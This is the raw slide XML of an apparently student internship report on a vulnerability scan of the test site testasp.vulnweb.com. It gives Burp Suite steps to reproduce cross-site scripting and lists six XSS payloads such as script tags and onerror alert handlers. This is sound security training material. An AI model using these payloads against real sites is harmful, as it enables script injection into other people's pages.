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74" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="280" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="283"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1864"/>
    <a:srgbClr val="3F3F3F"/>
    <a:srgbClr val="014067"/>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4674" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="284" y="15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7/9/2021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7/9/2021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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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dirty="0"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>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dirty="0"/>
              <a:t>Click icon to add table</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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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testasp.vulnweb.com/" TargetMode="Externa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55850" y="2855631"/>
            <a:ext cx="467309" cy="1118752"/>
            <a:chOff x="2955850" y="2902286"/>
            <a:chExt cx="467309" cy="1118752"/>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84731" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"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84731" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>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REPORT ON VULNERABILITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57804FC9-5F2C-416B-909C-77E4E7EAB2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802384" y="6298059"/>
            <a:ext cx="3192882" cy="41862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b="0" i="0" kern="1200" spc="300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="ctr"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600" b="1" i="1" dirty="0"/>
              <a:t>INTERNSHIPSTUDIO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398069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BB0B-3CD4-4417-A290-18BEE7DAF5F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610522" y="368055"/>
            <a:ext cx="5260890" cy="268049"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABILITY SCAN ON :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>http://testasp.vulnweb.com/                                           </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEEDF44E-BF23-41AF-875B-1458217D6157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21553" t="18106" r="58868" b="9614"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="853902" y="1165386"/>
            <a:ext cx="2387065" cy="4957011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF3C9C40-E4CD-411D-A4C0-1050EE8E1521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="70632" b="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8054720" y="368055"/>
            <a:ext cx="3174755" cy="5754342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84BA197-D9E6-4EB5-B929-725E031A8D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="87684" b="72210"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4552750" y="1709213"/>
            <a:ext cx="2229060" cy="2829191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F505EFCB-0FA7-4D42-BB9F-1925C0328A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661373" y="1339881"/>
            <a:ext cx="3051209" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>By NETSPARKER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188976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EFD4E-3E41-4E32-9357-C1152017D986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365758" y="3070458"/>
            <a:ext cx="10943925" cy="2733575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>		           1. visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        2.On the top menu you will find a search option.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        3.Click on it and you will prompted with the search box.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        4.You can intercept the request in Burp suite.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        5.Now you can find different payloads for XSS.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        6.Send the request to intruder and paste all the payloads.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>                                        7. Try to find a successful payload for XSS.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" dirty="0">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D6ED79-A11A-46C4-AAF1-CAFD0368130F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4042610" y="904774"/>
            <a:ext cx="7356107" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEPS TO REPRODUCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4007776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8DE7A3-723E-477A-9A85-C8F6FE822304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128592" y="326003"/>
            <a:ext cx="1791972" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PAYLOADS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE31F4F-7F3F-40F5-B5CF-E80FF30DFF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962108" y="1327874"/>
            <a:ext cx="6247214" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>These are some payloads found by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8753A19-9725-4F08-8563-2EA58D3093EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995776" y="2011148"/>
            <a:ext cx="6106601" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;img src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/img&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;audio src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/audio&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;video src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/video&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;image src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753E725C-5737-41F2-BA9F-0DDCD0F534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9766" y="2054418"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDD86113-5BEE-472A-98E4-FCB297E6D5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9766" y="2608975"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFF1C38-2DE2-464A-930C-422294A6A8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9766" y="3163533"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26ECE839-52B9-4436-8AE9-C050EE810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9766" y="3703727"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC13B68C-A2A6-45DB-9B5F-63AA1357D2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9766" y="4258464"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6DE02A-001C-43C8-8243-E00C79D758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9766" y="4784115"/>
            <a:ext cx="296185" cy="296185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217836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DA78-1573-4E80-AA1C-E1B758A65D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1241658" y="818147"/>
            <a:ext cx="10112141" cy="538850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ECE576D-C36D-42E7-BEA7-6EEFE10E6FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="4772" b="5543"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154004" y="613610"/>
            <a:ext cx="12192000" cy="6150544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42D4DE66-CDB8-4AE2-848A-7C0542D7858C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514249" y="161881"/>
            <a:ext cx="5274644" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0"/>
              <a:t>PROOF FOR VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259560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00A92B-20A0-4A7E-9B0D-6A62477ED311}"/>
              </a:ext>
